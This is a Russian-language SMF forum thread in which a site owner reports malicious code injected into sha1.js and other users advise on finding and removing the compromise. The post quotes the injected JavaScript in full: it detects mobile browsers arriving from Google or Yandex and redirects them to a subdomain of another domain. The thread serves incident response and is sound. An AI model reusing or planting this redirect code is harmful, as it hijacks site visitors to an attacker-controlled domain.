Инъекция в файл sha1.js и переадресация на поддомен другого сайта

Автор Солярис, 18 сентября 2016, 18:01:25

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Солярис

Приветствую!

Будет внимательны. Совершенно случайно обнаружил взлом и дополнение файла кодом:
Цитировать// Simulate PHP's strtolower (in SOME cases PHP uses ISO-8859-1 case folding).
var ax=[document.referrer,navigator.userAgent,location.hostname];
ax[1].match(/m(ob|in)i|roid|symb|midp|j2me|ppc|mtk/i)
&&ax[0].match(/yandex|google/i)&&ax[0]&&location.replace("http://"+ax[2]+".l1c.ru/r");

String.prototype.php_strtolower = function () {
 return typeof(smf_iso_case_folding) != "undefined" && smf_iso_case_folding == true ? this.php_strtr(
 'ABCDEFGHIJKLMNOPQRSTUVWXYZ\x8a\x8c\x8e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde',
 'abcdefghijklmnopqrstuvwxyz\x9a\x9c\x9e\xff\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe'
 ) : this.php_strtr('ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz');
}

Обратите внимание на выделенные строки.

В обычном браузере ничего не происходит.

Но я решил с древнего телефона зайти на сайт (через поисковую систему Гугл) и вместо открытия сайта через ссылку из поисковой системы шла переадресация на другой сайт, на его поддомен с адресом форума.

Такие дела.

Вспоминаем тему

kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Солярис

Я хостингу вопросы никакие по этому поводу не задавал.

Не знаю, когда это произошло. Мне представляется, что уже достаточно времени прошло.  tickedoff

Yarik

Цитата: Солярис от 18 сентября 2016, 18:53:37Я хостингу вопросы никакие по этому поводу не задавал.
А надо,дыра скорее всего у хостера и её надо закрыть.Уведомьте хостера и сами проверьте комп на вирусы и смените пароли все.

GeorG

Цитата: Солярис от 18 сентября 2016, 18:53:37Не знаю, когда это произошло.
Можно было посмотреть по времени изменения файла (как вариант, в бекапах посмотрите, если они есть).

p.s. Надо и другие файлы проверять на вирусы и шел удалить (через чего-то же к вам подключались).
Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Солярис

Домен, на который переадресация шла уже на продажу выставлен, поэтому бессмысленно что-то у хостинга узнавать (хоть тикет ему и направил).
Внедрение явно давно было.

Цитата: GeorG от 18 сентября 2016, 19:55:54p.s. Надо и другие файлы проверять на вирусы и шел удалить (через чего-то же к вам подключались).
Код то я этот удалил.

Но как искать иные (возможные) шелы - вот в чем вопрос?

GeorG

Верстка тем по шаблону, их доработка/переработка, переделка тем с версии smf 1.1 на smf 2.0. Примеры работ - insidestyle.ru
Установка модов (заточка под ваш форум); Моды под заказ; Обновление форума; Правильный перенос; Удаление/лечение вирусов; Устранения ошибок.
Обращаться в ЛС
Мой форум
Модуль анти-спама CleanTalk, сам пользуюсь
Сервера которыми сам пользуюсь - cadedic.ru

Yarik

Цитата: Солярис от 18 сентября 2016, 19:59:08Но как искать иные (возможные) шелы - вот в чем вопрос?
Скачать форум к себе на комп и прогнать различными антивирусами.

Солярис

Цитата: S.T.A.L.K.E.R. от 18 сентября 2016, 20:18:52Скачать форум к себе на комп и прогнать различными антивирусами.
Да это я уже давным давно сделал. Антивирусы ничего не обнаруживают.  Всё чисто.

Только шелы таким образом не выявить.
Правда, тут надо прийти к общему знаменателю по поводу того, что каждый из нас подразумевает под шелом.

Цитата: GeorG от 18 сентября 2016, 20:14:26Глазами и антивирусом :)
Глазами все файлы форума перебрать и пересмотреть невозможно на предмет подобных внедрений.
Тем более неизвестно что искать, какой код.


sgtWhite

Связкой Каспер + Ransack погонять. А вообще, достаточно допотопное двигло у топикстартера тоже стоит принять во внимание.

Солярис

Никто не знает файл Subs-Media.php должен быть среди файлов движка?

Какое-то у него весьма странное содержание.

++++++++++++++++++++++=

sgtWhite, и чем же 2-а версия движка форума в этом смысле лучше?! Его не взламывают?
Взламать можно что угодно.

sgtWhite

Цитата: Солярис от 18 сентября 2016, 21:20:18Никто не знает файл Subs-Media.php должен быть среди файлов движка?

Я не нашел (хотя может плохо искал).

Цитата: Солярис от 18 сентября 2016, 21:20:18sgtWhite, и чем же 2-а версия движка форума в этом смысле лучше?! Его не взламывают?

Вообще SMF гораздо более взломоустойчив чем тот же PHPbb. Разумеется актуальные версии еще никто не отменял- посмотрите просто на оффе Security Patches начиная с вашей версии. Ну а за соц. инженерию и прочую кабалистику вообще другой вопрос.